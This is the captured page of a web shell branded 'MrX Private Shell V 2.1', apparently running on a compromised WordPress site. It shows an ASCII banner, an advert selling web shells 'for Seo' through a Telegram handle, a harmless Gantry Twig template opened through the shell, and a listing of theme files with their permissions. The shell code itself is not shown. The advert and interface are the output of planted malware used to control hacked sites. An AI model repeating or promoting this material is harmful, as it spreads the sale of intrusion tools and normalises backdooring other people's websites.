__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
{% set twigTemplate = 'meta-page.html.twig' %}
<div class="entry-meta">
{% block meta %}
{# Begin Meta - Date #}
{% if gantry.config.get('content.' ~ scope ~ '.meta-date.enabled', '0') and post.date %}
<div class="meta-date">
<i class="far fa-clock" aria-hidden="true"></i>
{% if gantry.config.get('content.' ~ scope ~ '.meta-date.prefix', '') is not empty %}
<span class="meta-prefix">{{ gantry.config.get('content.' ~ scope ~ '.meta-date.prefix', '') ~ ' ' }}</span>
{% endif %}
{% if gantry.config.get('content.' ~ scope ~ '.meta-date.link', '1') %}
<a href="{{ post.link }}" title="{{ post.title }}" class="meta-date-link">
<span class="date">{{ post.date(gantry.config.get('content.' ~ scope ~ '.meta-date.format', 'j F Y')) }}</span>
</a>
{% else %}
<span class="date">{{ post.date(gantry.config.get('content.' ~ scope ~ '.meta-date.format', 'j F Y')) }}</span>
{% endif %}
</div>
{% endif %}
{# End Meta - Date #}
{# Begin Meta - Author #}
{% if gantry.config.get('content.' ~ scope ~ '.meta-author.enabled', '0') and post.author.name %}
<div class="meta-author">
<i class="fa fa-pencil fa-pencil-alt" aria-hidden="true"></i>
{% if gantry.config.get('content.' ~ scope ~ '.meta-author.prefix', '') is not empty %}
<span class="meta-prefix">{{ gantry.config.get('content.' ~ scope ~ '.meta-author.prefix', '') ~ ' ' }}</span>
{% endif %}
{% if gantry.config.get('content.' ~ scope ~ '.meta-author.link', '1') %}
<a href="{{ post.author.link }}" title="{{ post.author.name }}" class="meta-author-link"><span class="author">{{ post.author.name }}</span></a>
{% else %}
<span class="author">{{ post.author.name }}</span>
{% endif %}
</div>
{% endif %}
{# End Meta - Author #}
{% endblock %}
</div>
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| comments.html.twig | File | 4.88 KB | 0775 |
|
| content-page.html.twig | File | 3.3 KB | 0775 |
|
| content-single.html.twig | File | 3.55 KB | 0775 |
|
| content.html.twig | File | 5.09 KB | 0775 |
|
| meta-page.html.twig | File | 2.14 KB | 0775 |
|
| meta.html.twig | File | 5.95 KB | 0775 |
|
| pagination.html.twig | File | 1.59 KB | 0775 |
|
| password-form.html.twig | File | 589 B | 0775 |
|
| sidebar.html.twig | File | 0 B | 0775 |
|